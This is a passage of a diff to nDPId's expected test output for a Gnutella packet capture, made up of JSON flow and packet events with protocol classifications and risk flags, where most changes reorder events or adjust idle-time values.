Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90741,"flow_last_seen":90825,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":853,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"77.58.211.52","src_port":50296,"dst_port":3806,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00921{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90742,"flow_last_seen":91375,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":877,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.198.244","src_port":50299,"dst_port":1194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":90746,"flow_last_seen":91439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3759,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.32.126.214","src_port":50318,"dst_port":59596,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90741,"flow_last_seen":90864,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"46.128.114.107","src_port":50298,"dst_port":6578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +01250{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":90746,"flow_last_seen":90948,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3245,"flow_avg_l4_payload_len":154,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":50314,"dst_port":6888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":84592,"flow_last_seen":85055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":1144,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"210.209.249.84","src_port":50268,"dst_port":24751,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90741,"flow_last_seen":91415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":903,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":50297,"dst_port":45710,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90747,"flow_last_seen":90850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1111,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":50323,"dst_port":26253,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3367,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":219447,"flow_last_seen":219447,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":219447,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.187.171.240","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3367,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":369,"flow_packet_id":1,"flow_last_seen":219447,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":219447,"pkt":"UlQAEjUCCAAn5uVZCABFAABD+bUAAIARLzoKAAIPWbur8HAJGMoAL2mkIFAxArFAxy3\/Egk2kZ9VAwABABAAAADDA1NDUEECglZDRUdUS0di"} 00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":40005,"flow_last_seen":43055,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":55708,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} @@ -1402,9 +1399,12 @@ 00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":12529,"flow_last_seen":43193,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":40232,"flow_last_seen":40630,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.252","src_port":50435,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":40232,"flow_last_seen":40630,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:3","src_port":62539,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90743,"flow_last_seen":96110,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1100,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.123.54.234","src_port":50301,"dst_port":54130,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":12529,"flow_last_seen":43193,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":40232,"flow_last_seen":40630,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:3","src_port":50435,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00792{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":90743,"flow_last_seen":101917,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.64.6.175","src_port":50302,"dst_port":4743,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90745,"flow_last_seen":91669,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":628,"flow_tot_l4_payload_len":1729,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"149.28.163.175","src_port":50311,"dst_port":49956,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":90744,"flow_last_seen":98168,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"220.238.145.82","src_port":50306,"dst_port":33527,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00792{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":90743,"flow_last_seen":101917,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.64.6.175","src_port":50302,"dst_port":4743,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3451,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":229238,"flow_last_seen":229238,"flow_idle_time":180000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":229238,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"91.172.56.198","src_port":28681,"dst_port":11984,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3451,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":370,"flow_packet_id":1,"flow_last_seen":229238,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":119,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":119,"pkt_l4_len":85,"thread_ts_msec":229238,"pkt":"UlQAEjUCCAAn5uVZCABFAABpeXIAAIARIJEKAAIPW6w4xnAJLtAAVXM5R05EED9JAQFMQVEyUApVRFBdL+I1CXBBRaArSAlETnBpbmtmbG95ZEANSVVSTABQRlMARE4AQQAQTkFUAF0v4jUxAgBkGsTy6U4JcA8="} 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3452,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":229238,"flow_last_seen":229238,"flow_idle_time":180000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":229238,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.131.202.24","src_port":28681,"dst_port":44748,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -1415,8 +1415,8 @@ 00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3454,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":373,"flow_packet_id":1,"flow_last_seen":229239,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":119,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":119,"pkt_l4_len":85,"thread_ts_msec":229239,"pkt":"UlQAEjUCCAAn5uVZCABFAABpd+QAAIARdQcKAAIPWHrpD3AJLOAAVT9CR05EED9MAQFMQVEyUApVRFBdL+I1CXDHjOZsSAlETnBpbmtmbG95ZEANSVVSTABQRlMARE4AQQAQTkFUAF0v4jUxAgBkGsTy6U4JcA8="} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3455,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":229240,"flow_last_seen":229240,"flow_idle_time":180000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":229240,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"62.35.190.5","src_port":28681,"dst_port":18604,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3455,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":374,"flow_packet_id":1,"flow_last_seen":229240,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":119,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":119,"pkt_l4_len":85,"thread_ts_msec":229240,"pkt":"UlQAEjUCCAAn5uVZCABFAABpQyQAAIAR7ygKAAIPPiO+BXAJSKwAVQDtR05EED9NAQFMQVEyUApVRFBdL+I1CXAx8WVwSAlETnBpbmtmbG95ZEANSVVSTABQRlMARE4AQQAQTkFUAF0v4jUxAgBkGsTy6U4JcA8="} -00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3481,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":90738,"flow_last_seen":115276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":232090,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"200.7.155.210","src_port":50291,"dst_port":28365,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3580,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":65065,"flow_last_seen":65065,"flow_idle_time":180000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":1042,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":242463,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":57623,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3580,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":90738,"flow_last_seen":115276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":242463,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"200.7.155.210","src_port":50291,"dst_port":28365,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00630{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3580,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":129210,"flow_last_seen":129210,"flow_idle_time":120000,"flow_min_l4_payload_len":117,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":242463,"l3_proto":"ip4","src_ip":"84.197.97.94","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00565{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3580,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":61191,"flow_last_seen":61191,"flow_idle_time":180000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":242463,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.2","src_port":57619,"dst_port":5351,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00550{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3580,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":61191,"flow_last_seen":61191,"flow_idle_time":180000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":242463,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.2","src_port":57619,"dst_port":5351,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -1689,7 +1689,7 @@ 00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71540,"flow_last_seen":71540,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"154.3.42.104","src_port":28681,"dst_port":11804,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71537,"flow_last_seen":71537,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.205.126.102","src_port":28681,"dst_port":5193,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71537,"flow_last_seen":71537,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.205.126.102","src_port":28681,"dst_port":5193,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00913{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":126831,"flow_last_seen":130215,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10878,"flow_avg_l4_payload_len":518,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50330,"dst_port":46906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00913{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":126831,"flow_last_seen":130215,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10878,"flow_avg_l4_payload_len":518,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50330,"dst_port":46906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":72851,"flow_last_seen":72851,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.225.140.186","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 